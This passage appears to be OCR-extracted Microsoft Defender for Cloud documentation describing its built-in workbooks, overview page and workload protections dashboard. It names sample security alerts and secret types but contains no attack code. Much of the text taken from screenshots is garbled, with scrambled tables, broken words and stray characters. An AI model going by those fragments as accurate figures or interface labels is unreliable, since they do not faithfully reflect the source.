Contributor permissions on the target resource group 


Cloud availability: @ commercial clouds @ National (Azure Government, Azure China 
21Vianet) 


Workbooks gallery in Microsoft Defender for 
Cloud 


With the integrated Azure Workbooks functionality, Microsoft Defender for Cloud makes 
it straightforward to build your own custom, interactive workbooks. Defender for Cloud 
also includes a gallery with the following workbooks ready for your customization: 


e ‘Secure Score Over Time’ workbook - Track your subscriptions’ scores and changes 
to recommendations for your resources 

e ‘System Updates' workbook - View missing system updates by resources, OS, 
severity, and more 

e ‘Vulnerability Assessment Findings’ workbook - View the findings of vulnerability 
scans of your Azure resources 

e ‘Compliance Over Time’ workbook - View the status of a subscription's compliance 
with the regulatory or industry standards you've selected 

e ‘Active Alerts' workbook - View active alerts by severity, type, tag, MITRE ATT&:CK 
tactics, and location. 

e Price Estimation workbook - View monthly consolidated price estimations for 
Microsoft Defender for Cloud plans based on the resource telemetry in your own 
environment. These numbers are estimates based on retail prices and don't 
provide actual billing data. 

e Governance workbook - The governance report in the governance rules settings 
lets you track progress of the rules effective in the organization. 

e 'DevOps Security (Preview)' workbook - View a customizable foundation that helps 
you visualize the state of your DevOps posture for the connectors you've 
configured. 


In addition to the built-in workbooks, you can also find other useful workbooks found 
under the “Community” category, which is provided as is with no SLA or support. 
Choose one of the supplied workbooks or create your own. 


Home > Microsoft Defender for Cloud 


a Microsoft Defender for Cloud | Workbooks | Gallery + -~ 


Showing 14 subscriptions 
2 Search 

General 

© Overview 

@ Getting started 

= Recommendations 

@ Security alerts 

@ Inventory 


&@. Cloud Security Explorer 
(Preview) 


@ Workbooks 

& Community 

@ Diagnose and solve problems 
Cloud Security 

© Security posture 

E Regulatory compliance 

D Workload protections 

E, Firewall Manager 


E DevOps Security (Preview) 


Management 


+ New Č) Refresh © Feedback ? Help D Community Git repo v 
| 2 filter by name or category J 


A Quick start 


Empty 
A completely empty workbook. 


A Recently modified workbooks (8) 


Subscription : ASC DEMO 


Secure Score Over Time - f... | 


(@) Workbo... - Jij Ahmed Masaiha 


a Governance MC 


(6) MorRG - Af Lior Arviv 


^ Defender for Cloud (6) 


Secure Score Over 


Track your subscriptions’ 


‘System Updates 


View missing system updates by res 
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Compliance Over Time 
Track your compliance and standards 


Governance (Preview) 


Coverage 


Resource Group : All 


@ Browse across galleries 


Reset tilters 


Governance (Preview) test |, Secure Score Over Time test 
fa) Workbo... - JẸ Ahmed Masalha ( [8] Workbo... - JẸ Ahmed Masalha (. 
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Active Alerts 


urity alerts of your 


Ransomware Dashboard 


Price Estimation 


@ Tip 


Use the Edit button to customize any of the supplied workbooks to your 


satisfaction. When you're done editing, select Save and your cha 
to a new workbook. 


nges will be saved 


Microsoft Defender for Cloud | Workbooks | Secure Score Over Time d 


Showing 73 subscriptions 


» ed Workbooks [2 eat, O e) x © d Help D Auto refresh: Off 


Use the 'Secure Score Over Time' workbook 


This workbook uses secure score data from your Log Analytics workspace. That data 


needs to be exported from the continuous export tool as described in Configure 


continuous export from the Defender for Cloud pages in Azure portal. 


When you set up the continuous export, set the export frequency t 
updates and snapshots. 


Export frequency 


Export updates in real-time. 


E streaming updates dk 


o both streaming 


Export weekly snapshot of the data types selected under ‘Exported data types’. 
These supported data types are: overall Secure score, secure score controls, regulatory 


compliance. 


edi Snapshots (Preview) oy 


© Note 


Snapshots get exported weekly, so you'll need to wait at least one week for the first 


snapshot to be exported before you can view data in this workbook. 


@ Tip 


To configure continuous export across your organization, use the supplied Azure 


Policy 'DeploylfNotExist' policies described in Configure continuous export at 


scale. 


The secure score over time workbook has five graphs for the subscriptions reporting to 


the selected workspaces: 


Graph 


Score trends for the last week and month 
Use this section to monitor the current score and general 
trends of the scores for your subscriptions. 


Aggregated score for all selected subscriptions 
Hover your mouse over any point in the trend line to see the 
aggregated score at any date in the selected time range. 


Recommendations with the most unhealthy resources 
This table helps you triage the recommendations that have 
had the most resources changed to unhealthy over the 
selected period. 


Scores for specific security controls 

Defender for Cloud's security controls is logical groupings of 
recommendations. This chart shows you, at a glance, the 
weekly scores for all of your controls. 


Example 


| | AK AR l 


© Aggregated 


Pr Ier Sr Sr a 


Graph Example 


Resources changes 


Recommendations with the most resources that have 
changed state (healthy, unhealthy, or not applicable) during 
the selected period are listed here. Select any 
recommendation from the list to open a new table listing the 


owe 


specific resources. 


Use the ‘System Updates’ workbook 


This workbook is based on the security recommendation "System updates should be 
installed on your machines". 


The workbook helps you identify machines with outstanding updates. 
You can view the situation for the selected subscriptions according to: 


e The list of resources with outstanding updates 
e The list of updates missing from your resources 


Microsoft Defender for Cloud | Workbooks | System Updates 


Showing 64 subscriptions 


@ workbooks o Edit O ay x © ? Help 
System Updates (Preview) 


Subscription Show Help © 
| All v | (Yes ( no ) 
Count of resources by health Count of unhealthy machines by operating systen Count of missing updates by severity GO 
Healthy NotA Windows Linu Medium High 
SA l 233 157 15 2 93 76 
Resource View 
ize 
Missing system updates | Select an update to see the affected machines 
| P Search 
Update T4 Operating system ‘Ty Severity TA Affected machines Ty 
2021-02 Servicing Stack Update for Windows Server 2016 for x64-based Systems (KB5001078) Windows @ High 10 
2020-10 Security Update for Adobe Flash Player for Windows 10 Version 1809 for x64-based Systems (KB4580325) Windows @ High ed 
2021-02 Update for Windows 10 Version 1809 for x64-based Systems (KB4023057) Windows @ High ee 
RHSA-2020:5002 curl_0:7.29.0-59.el7_9.1 security update Moderate Linux A Medium Ee 
RHSA-2020:5009 python_0:2.7.5-90.el7 security update Moderate Linux A Medium B 


Use the 'Vulnerability Assessment Findings’ workbook 


Defender for Cloud includes vulnerability scanners for your machines, containers in 


container registries, and SQL servers. 


Learn more about using these scanners: 


e Scan your ACR images for vulnerabilities 
e Scan your ECR images for vulnerabilities 


Scan your SQL resources for vulnerabilities 


Find vulnerabilities with the integrated Qualys scanner 


Find vulnerabilities with Microsoft Defender Vulnerability Management 


Findings for each resource type are reported in separate recommendations: 


e Vulnerabilities in your virtual machines should be remediated £ (includes findings 


from Microsoft Defender Vulnerability Management, the integrated Qualys 


scanner, and any configured BYOL VA solutions) 


e Container registry images should have vulnerability findings resolved 7 


e SQL databases should have vulnerability findings resolved £ 


e SQL servers on machines should have vulnerability findings resolved “ 


This workbook gathers these findings and organizes them by severity, resource type, 


and category. 


Microsoft Defender for Cloud | Workbooks | Vulnerability Assessment Findings 


Showing 64 subscriptions 


@ workbooks d Edit O OS © ? Hep 


Vulnerability Assessment Findings (Preview) 


Subscription Show Help © 
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Overview | Select a machine to view the list of vulnerabilities 
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Vulnerabilities 


Use the search box to filter vulnerabilities by resource, resource group, CVE, severity, etc. 


Low ty Available patchesTy GES Ty 


eI 
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Vulnerabilities by category 
Windows 


|44 


Debian 


|44 


Internet Explorer 
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RedHat 


|43 


Security Policy 


|34 


Security Solution Finding 


ISA 


P Search 


Severity ty Description 
> High (251) 
> Medium (64) 


> Low (3) 


Use the 'Compliance Over Time’ workbook 


îy Patchable Ty Category Ty Resource Ty Resource group Ty Time generated Ty Threat 


Microsoft Defender for Cloud continually compares the configuration of your resources 


with requirements in industry standards, regulations, and benchmarks. Built-in standards 
include NIST SP 800-53, SWIFT CSP CSCF v2020, Canada Federal PBMM, HIPAA HITRUST, 
and more. You can select the specific standards relevant to your organization using the 


regulatory compliance dashboard. Learn more in Customize the set of standards in your 


regulatory compliance dashboard. 


This workbook tracks your compliance status over time with the various standards 


you've added to your dashboard. 


Compliance Over Time (Preview) 


DO Please take time to answer a quick survey, click here. 


Workspace © Subscription 
| an v | | cybersesoc ba 
Standard name 
| all A 
Select 
PAI 
Items T4 Passed controls 
ISO 27001 1/13 
— 
PCI DSS 3.2.1 2/20 
— 
A ity hmark 
a zure Security Benchmar 6/43 
be 


C] AWS Foundational Security Best Practices 
[_] aws Pci pss 3.2.1 


Tl cer cis 1.1.0 


O 
18/40 
[C] aws cis 1.2.0 
[_] soc tsp 58/77 
GCP-CIS-1.1.0 45/46 


ty 


Passed controls % Ty 7-day change 


7.69% 0% 
10% 0% 
14% 0% 
30% 0% 
39.5% 0% 
45% M 2.5% 
75.3% Ww -1.3% 


TA 
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When you select a standard from the overview area of the report, the lower pane reveals 


a more detailed breakdown: 


Microsoft Defender for Cloud | Workbooks | Compliance Over Time x 
Showing subscription ‘CyberSecSOC’ 


a Workbooks L Edit © G È EO ? Help D Auto refresh: Off 
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100% -CIS- 

Compliance regulatory standards Passed controls TL Passed ————————— a EA 
B AWS-Foun... 
SOC-TSP is a E Aws-PCI-D... 

— = 80% Te = 
AWS-CIS-1.... 

ISO-27001 2/20 10% 

—z lei W Azure-Secu... 
PCI-DSS-3.2.1 6/43 14% 60% L Pci-Dss-3.... 


N W iso-27001 
E SOc-TsP 


p! 


Azure-Security-Benchmark N 
40% 


AWS-CIS-1.2.0 17/43 39.5% 
O kera Eee Ei 
de D E 18/40 45% 
AWS-PCI-DSS-3.2.1 Ja 20% 
= ji H ity- = j 58/77 75.3% 
AWS-Foundational-Security-Best-Practices / 
0% 
GCP-CIS-1.1.0 45/46 97.8% 
pen leei Apr11 Apr18 Apr 25 May 2 May 9 May 16May 23May 30 Jun 6 


| GCP-CIS-110 (Last) | AWS-Foundational-Securi... | AWS-PG-DSS-321 (Last) 


97.83« 181.82» 147.5. 


Changes for ‘Azure-Security-Benchmark’ 
Main Control Passed controls ty Passed Controls % T4  7-days change T4 30-days change TA 
BR - Backup and Recovery 6 0% 0% 

NS - Network Security 

PV - Posture and Vulnerability Management 
DP - Data Protection 

IM - Identity Management 

PA - Privileged Access 

LT - Logging and Threat Detection 

AM - Asset Management 


IR - Incident Response 


0% 0% 
0% 0% 
0% 0% 
0% 0% 
0% 0% 
0% 0% 
0% 0% 
0% 0% 
0% 0% 


ES - Endpoint Security 


You can keep drilling down - right down to the recommendation level - to view the 
resources that have passed or failed each control. 


Ọ Tip 


For each panel of the report, you can export the data to Excel with the "Export to 
Excel" option. 


Changes for 'Azure-Security-Benchmark’ 


Main Control TL Passed controls Ty Passed Controls% Ty 7-dayschange Ty 

IM - Identity Management 0/4 0% 0% 
bere 

BR - Backup and Recovery 0/3 0% 0% 0% 
pe 

NS - Network Security 0/5 0% 0% 0% 
re 

AM - Asset Management 0/2 0% 0% 0% 
pa 

DP - Data Protection 1/5 20% 0% 0% 
OO — 

PV - Posture and Vulnerability Management 1/5 20% 0% 0% 
OO — 

ES - Endpoint Security 1/3 33.33% 0% 0% 
= arak 

LT - Logging and Threat Detectior 2/6 33.33% 0% 0% 
I: TT 

PA - Privileged Access 2/4 50% 0% “i -25% 
CC B Ss 


Use the ‘Active Alerts’ workbook 


This workbook displays the active security alerts for your subscriptions on one 
dashboard. Security alerts are the notifications that Defender for Cloud generates when 
it detects threats on your resources. Defender for Cloud prioritizes, and lists the alerts, 
along with information needed for quick investigation and remediation. 


This workbook benefits you by letting you understand the active threats on your 


environment, and allows you to prioritize between the active alerts. 


O Note 


Most workbooks use Azure Resource Graph (ARG) to query their data. For example, 
to display the Map View, Log Analytics workspace is used to query the data. 
Continuous export should be enabled, and export the security alerts to the Log 
Analytics workspace. 


You can view the active alerts by severity, resource group, or tag. 


Active Alerts 


@ Please take time to answer a quick survey, click here. 


Subscription: | 2 selected w | 


Severity E Resource Group GO Tag 
low Other nonprod 
207 291 100 
Medium asc-ignite-demo-rg | 
149 156 86 
High policy addon demo-rg | true 
142 153 40 
498 904 protected-kubemetes-clemo-rg 227 empty 
138 1 
sample-rg 
87 


gke-demo-us-centrale2e 


79 


You can also view your subscription's top alerts by attacked resources, alert types, and 


new alerts. 


Top 5 attacked resources (with High Severity) 


Resourceld N Count 
2 detection-demo-us-central 79 
EA sample-VM 6 
E Sample-VM 6 
= protected-kubernetes-demo 5 
$ policy-addon-demo 4 


You can get more details on any of these alerts by selecting it. 


6 Active Alerts 


Severity D AlertDisplayName 


[SAMPLE ALERT] Digital currency mining related behavior d 
[SAMPLE ALERT] Detected Petya ransomware indicators 
ISAMPLE ALERT] Potential SQL Injection 

[SAMPLE ALERT] Detected suspicious file cleanup commanc 
[SAMPLE ALERT] Attempted logon by a potentially harmful 
[SAMPLE ALERT] Suspected successful brute force attack 


Isincident 


Alert 


Alert 


Alert 


Alert 


Alert 


Alert 


Top alert types 
AlertDisplayName Vy 
Manipulation of scheduled tasks detected (Preview) 
Enumeration of files with sensitive data 
Microsoft Defender for Cloud test alert (not a threat). (Pre 


Possible attack tool detected (Preview) 


Traffic detected from IP addresses recommended for bloc... 


NL Status Ty Tactics My SeverityRank D 
Active Execution 3 
Active Execution 3 
Active PreAttack 3 
Active DefenseEvasion 3 
Active PreAttack 3 
Active PreAttack 3 


CountTy, 


5 


39. A 


OI 


KU 


Subscriptionid 


+ egie + egien 


DEMO 


DEMO 


DEMO 


DEMO 


DEMO 


DEMO 


New Alerts (Since last 24hrs) 


AlertDisplayName 


All 


N 


Microsoft Defender for Cloud test alert (not a threat). (Pre. 


N 


ResourceGroup Tu 
Sample-RG 
Sample-RG 
Sample-RG 
Sample-RG 
Sample-RG 


Sample-RG 


EAO 
Central US 
Central US 
Central US 
Central US 
Central US 


Central US 


Resourceld 

 sample-vM 
WA sample-vM 
A sample-vM 
EA sample-vM 
EA sample-vM 


A sample-VM 


The MITRE ATT&CK tactics display by the order of the kill-chain, and the number of 
alerts the subscription has at each stage. 


MITRE ATT&CK tactics 


500 
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. a 
o 
E ed 
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[407 liga Deo 


eg 


CommandAndControl 


|65 


sò 
AE 


e 


do 
eri 


PreAttack PrivilegeEscalation 


lét Da l4 


3 d 


InitialAccess 


25 


| Exfiltration | 


Other 


21 


a 
oo 


You can see all of the active alerts in a table with the ability to filter by columns. Select 


an alert to view button appears. 


List View Men View 


Resource: All w 


Active Alerts 


Severity: All V 


ResourceGroup: All v 


AlertName: All W 


Tag: All v 


Tactics TA Subscriptionid 


Persistence 


2122122 -212-212- 


212-212-2122122 
212-212-2122122 


212-212-2122122 


212-212-2122122 
212 -212-2122122 
212-212-2122122 


212 -212-2122122 


InitialAccess 2122122 -212-212- 

Execution 2122122 -212-212- 

Execution 2122122- 212 -212-212-212 - 2122122 
PreAttack 2122122 -212-212- 

PreAttack 2122122 -212-212- 

InitialAccess 2122122 -212-212- 

Unknown 2122122 -212-212 - 

PreAttack 2122122 -212-212 


DefenseEvasion 2122122 -212-212 


2122122 -212-212 


-212 -212-2122122 


-212-212 -2122122 


-212 -212-2122122 


Severity My AlertDisplayName My Isincident Ty 
Microsoft Defender for Cloud test alert for KƏS (nota thr.. Alert 
Exposed Kubernetes dashboard detected (Preview) Alert 
[SAMPLE ALERT] Digital currency mining related behavior... Alert 
[SAMPLE ALERT] Detected Petya ransomware indicators Alert 
High O e [SAMPLE ALERT] Suspected successful brute force attack Alert 
[SAMPLE ALERT] Potential SQL Injection Alert 
Exposed Kubemnetes dashboard detected Alert 
Possible attack tool detected Alert 
[SAMPLE ALERT] Attempted logon by a potentially harmf... Alert 
[SAMPLE ALERT] Detected suspicious file cleanup comma... Alert 
[SAMPLE ALERT] MicroBurst exploitation toolkit used to e... Alert 
3 


A Results were limited to the first 250 rows. 


Collection 


N 


ResourceGroup TL tags Ny 
securityconnector 

securityconnector 

Sample-RG 

Sample-RG 

Sample-RG 

Sample-RG 

PROTECTED-KUBERNETES-DEMO-RG 
protected-kubernetes-demo-rg 

Sample-RG 


Sample-RG 


By selecting the Open Alert View button, you can see all the details of that specific alert. 


Home > Microsoft Defender for Cloud > 


Security alert d 


Detected Petya ransomware indicators 


Sample alert 


High 


Severity Status 


ee © 11/20/21, 1... 
Activity time 


Alert description D Copy alert JSON 


THIS IS A SAMPLE ALERT: Analysis of host data on OMS-AGENT-2 
detected indicators associated with Petya ransomware. See 
https://blogs.technet.microsoft.com/mmpc/2017/06/27/new- 
ransomware-old-techniques-petya-adds-worm-capabilities/ for more 


information. Review the command line associated in this alert and 
escalate this alert to your security team. 


Affected resource 


Sample-VM 
Virtual machine 


? DEMO 
Subscription 


MITRE ATT&CK® tactics © 


e Execution 


\ Was this useful? © © Yes © No x 


Alert details 


Take action 


Compromised Host 
Sample-VM 


Suspicious Process ID 
0x1574 


Suspicious Command Line 


sample 


Suspicious Process 


c:\windows\system32\sample.exe 


Related entities 


v E Account (1) 

v E File 

v E Host (1) 

w SE Host logon session (1) 


v d Process (2) 


Next: e Action >> 


Account Session ID 
0x12ed4a93 


User Name 


Sample-account 


Enrichment_tas_threat_reports 


Report: Petya 


Detected by 


E Microsoft 


By selecting Map View, you can also see all alerts based on their location. 


List View Map View 


To see more information about the alerts in the map view: 


1. Configure continuous export to export your security alerts to a Log Analytics workspace by following the instructions described here. 
2. In the "Workspace" filter below, choose the Log Analytics workspace your security alerts are exported to. 


Workspace: All V 


AlertsMapView 5 


Central US Unknown West US East US 2 East US North Europe West Europe 


248 220 156 138 102 40 1 


Select a location on the map to view all of the alerts for that location. 


List View Map View 


To see more information about the alerts in the map view: 


1. Configure continuous export to export your security alerts to a Log Analytics workspace by following the instructions described here. 
2. In the “Workspace” filter below, choose the Log Analytics workspace your security alerts are exported to. 


rkspace: | 2 selected v 


(we A 


AlertsMapView 2 i) 
Resourceld ty AlertDisplayName Ty Subscriptionid 


= citansdefaultstorage Storage account with potentially sensitive data has... 346b5f8a-4f0d-440e-8a45-0cOb£ 


TO EZ eitansdefaultstorage Access from a Tor exit node to a storage blob conta... 346b5f8a-4f0d-440e-8a45-OcObE 


North Europe 


Open Alert View 


You can see the details for that alert with the Open Alert View button. 


Use the 'DevOps Security (Preview)' workbook 


This workbook provides a customizable data analysis and gives you the ability to create 
visual reports. You can use this workbook to view insights into your DevOps security 
posture in coordination with Defender for DevOps. This workbook allows you to 
visualize the state of your DevOps posture for the connectors you've configured in 
Defender for Cloud, code, dependencies, and hardening. You can then investigate 
credential exposure, including types of credentials and repository locations. 


@ Workbooks Edit 


DevOps Security 


Show Help © 


Cres GD 


Overview Secrets Code 


Exposed secrets 
High 


|16 


Exposed secrets by repo 


Repository N 
Microsoft.Security 
Microsoft.Security 
Microsoft.Security 
Microsoft.Security 
Toy-Website 
Toy-Websit 


O Note 


O OS © ? Hep D Auto refresh: off 


OSS Vulnerabilities Infrastructure as Code Posture 
Code security 
Medium 
393 p- 


Code vulnerabilities by repo 
Resource N 
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RS1312 
Microsoft Security 
DemoRS2311 


DfDDemo 
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DevOps security 
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39 l 28 
DevOps vulnerabilities by repo 
My Resource N 
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RS1312 

DfDDemo 
DemoRS2311 
ContainerScanning 
DfD Playground 


Toy-Website 
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You must have a GitHub connector or a DevOps connector, connected to your 


environment in order to utilize this workbook 


To deploy the workbook: 


1. Sign in to the Azure portal £. 


2. Navigate to Microsoft Defender for Cloud > Workbooks. 


3. Select the DevOps Security (Preview) workbook. 


The workbook will load and show you the Overview tab where you can see the number 


of exposed secrets, code security and DevOps security. All of these findings are broken 


down by total for each repository and the severity. 


Select the Secrets tab to view the count by secret type. 


Overview ff Secrets B Code 
Count by secret type 
22 
Secret scanning 
Repository Ty) Status 
E3 peter-test-deps A Unhealthy 
E8 Microsoft.Security A unhealthy 


The Code tab displays your count findings by tool and repository and your code 


scanning by severity. 


DevOps Security 


Show Help © 


Ces 


OSS Vulnerabilities 


azure_storage_account_key 
8 
| google _api_key 


3 
aws secret_access key 
2 

aws access key id 


2 


Infrastructure as Code 


azure_active directory application secret 


2 


Overview Secrets OSS Vulnerabilities Infrastructure as Code Posture Threats & Tactics 


Count findings by tool 
Wi CodeQL 
E Gore 
Unknown 
E Sur 
Code scanning by severity 
Group Tu Repository Tu RulelD 


> Microsoft.Security (1) 

> DfDDemo (1) 

> juice-shop-GHASDFD (1) 
> peter-test-deps (1) 


> RS1312 (1) 


Count findings by repository 


as s? 


EE hiza 


187 


TA Branch 


KO petertest-deps HO 


Posture 


TL Severity Ty Secret 
High google_api_key 
High azure_storage_account_key 


w 
5 139 rtzen | Parre 


TL Severity T4 Status 


Threats & Tactics 


TL Details TA 


De 


TA Finding 


@ Information 


@ Information 


A potential secret was detected. Validate file contains secrets, remove, rotate credential, and use approved store. For additional information on secret remediation see https://aka.ms/CredScan... 


H juice-shop-GHASDFD 
E peter-test-deps 

L R51312 

E Microsoft Security 

B DemoRS2311 

B Piter 


TA Details TA 
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The Open Source Security (OSS) Vulnerabilities tab displays your OSS vulnerabilities by 
severity and the count of findings by repository. 


DevOps Security 


Show Help © 


Overview Secrets Code Į OSS Vulneral Infrastructure as Code Posture Threats & Tactics 


Q 


OSS vulnerabilities by severity Count findings by repository 


ZO 25 
31 
beei 20 
16 
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48 
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[55 IR lio Er 
Group Ty Repository Ty Severity T4 Status My Summary Ty Package ®4 Finding Ty Details ti 
> Microsoft.Security (13) 
> DfDDemo (25) 
> juice-shop-GHASDFD (10) 
> DemoRS2311 (1) 
The Infrastructure as Code tab displays your findings by tool and repository. 
DevOps Security 
Show Help © 
(Yes e “No B 
Overview Secrets Code OSS Vulnerabilities Posture Threats & Tactics 
Findings by tool Count findings by repository 
be » ea a 
10 


do 


Group Ty Repository TL Severity Ty Status TL Puma, Package TL Finding MN 


Details TA 


> ContainerScanning (4) Q 


> juice-shop-GHASDFD (9) 


> DfDDemo (7) 


The Posture tab displays your security posture by severity and repository. 


DevOps Security 


Show Help © 
C ves 


Overview Secrets Code OSS Vulnerabilities Infrastructure as Code Threats & Tactics 


Security posture by severity Posture assessments by repository 


bei Se 
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Group My Repository My Visibility T4 Description My Status M Severity îy Details y 
> RS1312 (2) 
> DemoRS2311 (2) 
> Sentinel-Content (2) 
> ContainerScanning (2) 


> demo-bootstrap (2) 


> README (2) 


The Threats and Tactics tab displays the total count of threats and tactics and by 


repository. 


DevOps Security 


Show Help © 


Cres RE 


Overview Secrets Code OSS Vulnerabilities Infrastructure as Code Posture § Threats & Tactics 


Threats & tactics 


Threats & tactics by repository 
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N Tactics M Techniques N Details Du 
> DefenderForlOT (1) 


> DemoRS2311 (3) 

> DfD Playground (1) 

> DfDDemo (3) 

> IOT-Sensor-On-Demand (1) 


> Logingestion (1) 


Import workbooks from other workbook 
galleries 


To move workbooks that you've built in other Azure services into your Microsoft 
Defender for Cloud workbooks gallery: 


1. Open the target workbook. 


2. From the toolbar, select Edit. 


& 


E Microsoft Security 
Il juice-shop-GHASDFD 
H DiDDemo 

E DemoRS2311 
LARR 

W README 

L peter-test-deps 
E Toy-Website 

B DD Playground 
H Sentinel-Content 
L Other 


$ 


ZA ere Eo O @ © ? Help 


. From the toolbar, select </> to enter the Advanced Editor. 


WwW 


[©] Done Editing E 8 d pe GA Qo E Fale ? Help 


4. Copy the workbook's Gallery Template JSON. 


LI 


. Open the workbooks gallery in Defender for Cloud and from the menu bar select 
New. 


6. Select the </> to enter the Advanced Editor. 
7. Paste in the entire Gallery Template JSON. 
8. Select Apply. 


9. From the toolbar, select Save As. 


B Workbooks DZ) Done Editing Bi d pe GA OS p O ? Help 


10. Enter the required details for saving the workbook: 
a. A name for the workbook 
b. The desired region 
c. Subscription, resource group, and sharing as appropriate. 


You'll find your saved workbook in the Recently modified workbooks category. 


Next steps 


This article described Defender for Cloud's integrated Azure Workbooks page with built- 
in reports and the option to build your own custom, interactive reports. 


e Learn more about Azure Workbooks 


e The built-in workbooks pull their data from Defender for Cloud's 
recommendations. Learn about the many security recommendations in Security 
recommendations - a reference guide 


Microsoft Defender for Cloud's overview 


page 


Article e 07/20/2023 


Microsoft Defender for Cloud's overview page is an interactive dashboard that provides 


a unified view into the security posture of your hybrid cloud workloads. Additionally, it 


shows security alerts, coverage information, and more. 


You can select any element on the page to get more detailed information. 


ta] Microsoft Defender for Cloud | Overview 


Showing 102 subscriptions 

P Search 

General 

© Overview 

@ Getting started 
Recommendations 

© Attack path analysis 

@ Security alerts 

® Inventory 

E, Cloud Security Explorer 

@ Workbooks 

4 Community 


@ Diagnose and solve problems 


Cloud Security 
© Security posture 

E Regulatory compliance 
Ọ Workload protections 
E Firewall Manager 

E DevOps security (preview) 
Management 

I Environment settings 

E Security solutions 


D Workflow automation 


Y Subscriptions ZI What's new 


? 102 @ 49 


Azure subscriptions AWS accounts 


DO Security posture 


e 
8 237/244 21/43 O m 
Unassigned Overdue Attack paths 
recommendation recommendations 
Secure score 
© Azure 61% 
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AWS 28% 
46x 2 
SECURE SCORE EO 
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== 


Explore your security posture > 


DO Workload protections 


Resource coverage 


86% For full protection, enable 15 resource plans 


Alerts by severity 

400 D 

1.1K 
| m 

200 NEU 


|595 


GA AURA I 


2Sun 9 Sun 6 Sun 


Enhance your threat protection capabilities > 


© 114 


GCP projects 


E3 36588 v= 370 


Assessed resources 


S Regulatory compliance 


Microsoft cloud security benchmark 


D of 63 passed controls 
= 


Lowest compliance regulatory standards 
by passed controls 


AWS PCI DSS 3.2.1 Classic 0/40 
AWS CIS 1.2.0 Classic 0/43 
Reserve Bank of India IT Framework for NBFC 2/21 
= 


Improve your compliance > 


iø Inventory 


Unmonitored VMs 


A122 To better protect your organization, we recommend 
installing agents 


Total Resources 


36588 


Tunhealthy ] Healthy Not applicable 
(14154) (15025) (7409) 


Explore your resources > 


Features of the overview page 


Y Subscriptions SO What's new 


EO 


Azure subscriptions 


Metrics 


6 OS 


AWS accounts GCP projects 


The top menu bar offers: 


f3 18236 E 


Assessed resources 


Active recommendations 


Active recommendations 


GO IA Ọ 2895 


Attack paths Security alerts 


aN 


Upgrade to new Defender CSPM plan 


E Defender Cloud Security Posture Management (CSPM) 
provides enhanced posture capabilities and a new 
intelligent cloud security graph to help identify, prioritize, 
and reduce risk. Defender CSPM is available in addition 
to the free foundational security posture capabilities 


turned on by default in Defender for Cloud. 


Click here to upgrade > 


Defender EASM 


Gi Protect your organization with a holistic view of your 
internet security posture. Microsoft Defender EASM 
discovers assets across all your first- and third-party 
internet-exposed infrastructure, identifying potential 


vulnerabilities and compliance risks for remediation. 


Explore assets in Defender EASM > 


Defender for Cloud community 


IA Join the Defender for Cloud community on GitHub to 
share knowledge and interact with other customers 
and experts, The community is a great place to learn 


and provide feedback. 


View Azure Community > Q 


Q JO 


Security alerts 


e Subscriptions - You can view and filter the list of subscriptions by selecting this 


button. Defender for Cloud will adjust the display to reflect the security posture of 


the selected subscriptions. 

e What's new - Opens the release notes so you can keep up to date with new 
features, bug fixes, and deprecated functionality. 

e High-level numbers for the connected cloud accounts, showing the context of the 
information in the main tiles, and the number of assessed resources, active 
recommendations, and security alerts. Select the assessed resources number to 
access Asset inventory. Learn more about connecting your AWS accounts and your 
GCP projects. 


Feature tiles 


The center of the page displays the feature tiles, each linking to a high profile feature or 
dedicated dashboard: 


e Security posture - Defender for Cloud continually assesses your resources, 
subscriptions, and organization for security issues. It then aggregates all the 
findings into a single score so that you can understand, at a glance, your current 
security situation: the higher the score, the lower the identified risk level. Learn 
more. 

e Workload protections - This is the cloud workload protection platform (CWPP) 
integrated within Defender for Cloud for advanced, intelligent protection of your 
workloads running on Azure, on-premises machines, or other cloud providers. For 
each resource type, there's a corresponding Microsoft Defender plan. The tile 
shows the coverage of your connected resources (for the currently selected 
subscriptions) and the recent alerts, color-coded by severity. Learn more about the 
Defender plans. 

e Regulatory compliance - Defender for Cloud provides insights into your 
compliance posture based on continuous assessments of your Azure environment. 
Defender for Cloud analyzes risk factors in your environment according to security 
best practices. These assessments are mapped to compliance controls from a 
supported set of standards. Learn more. 

e Inventory - The asset inventory page of Microsoft Defender for Cloud provides a 
single page for viewing the security posture of the resources you've connected to 
Microsoft Defender for Cloud. All resources with unresolved security 
recommendations are shown in the inventory. If you've enabled the integration 
with Microsoft Defender for Endpoint and enabled Microsoft Defender for Servers, 
you'll also have access to a software inventory. The tile on the overview page 
shows you at a glance the total healthy and unhealthy resources (for the currently 
selected subscriptions). Learn more. 


Insights 
The Insights pane offers customized items for your environment including: 


e Actionable items to enhance your security. 

e Tips to handle alerts and recommendations. 

e Recommendations on how to to upgrade your service to enhance your 
environments protections. 


e Recent blog posts by Microsoft Defender for Cloud experts. 


Next steps 


This page introduced the Defender for Cloud overview page. For related information, 
see: 


e Explore and manage your resources with asset inventory and management tools 
e Secure score in Microsoft Defender for Cloud 


The workload protections dashboard 


Article e 02/27/2023 


This dashboard provides: 


resource types. 


Threat detection alerts. 


The onboarding state and agent installation. 


Links to configure advanced threat protection capabilities. 


Visibility into your Microsoft Defender for Cloud coverage across your different 


To access the workload protections dashboard, select Workload protections from the 


Cloud Security section of Defender for Cloud's menu. 


What's shown on the dashboard? 


9 Microsoft Defender for Cloud | Workload protections 
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The dashboard includes the following sections: 
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1. Microsoft Defender for Cloud coverage - Here you can see the resources types 


that's in your subscription and eligible for protection by Defender for Cloud. 


Wherever relevant, you can upgrade here as well. If you want to upgrade all 


possible eligible resources, select Upgrade all. 


2. Security alerts - When Defender for Cloud detects a threat in any area of your 
environment, it generates an alert. These alerts describe details of the affected 
resources, suggested remediation steps, and in some cases an option to trigger a 
logic app in response. Selecting anywhere in this graph opens the Security alerts 


page. 


3. Advanced protection - Defender for Cloud includes many advanced threat 
protection capabilities for virtual machines, SQL databases, containers, web 
applications, your network, and more. In this advanced protection section, you can 
see the status of the resources in your selected subscriptions for each of these 
protections. Select any of them to go directly to the configuration area for that 
protection type. 


4. Insights - This rolling pane of news, suggested reading, and high priority alerts 
gives Defender for Cloud's insights into pressing security matters that are relevant 
to you and your subscription. Whether it's a list of high severity CVEs discovered 
on your VMs by a vulnerability analysis tool, or a new blog post by a member of 
the Defender for Cloud team, you'll find it here in the Insights panel. 


Next steps 


In this article, you learned about the workload protections dashboard. 


Enable enhanced protections 


Learn more about the advanced protections provided by the Defender plans. 


Access and track your secure score 


Article e 01/09/2023 


You can find your overall secure score, and your score per subscription, through the 
Azure portal or programmatically as described in the following sections: 


Ọ Tip 


For a detailed explanation of how your scores are calculated, see Calculations - 


understanding your score. 


Get your secure score from the portal 


Defender for Cloud displays your score prominently in the portal. When you select the 
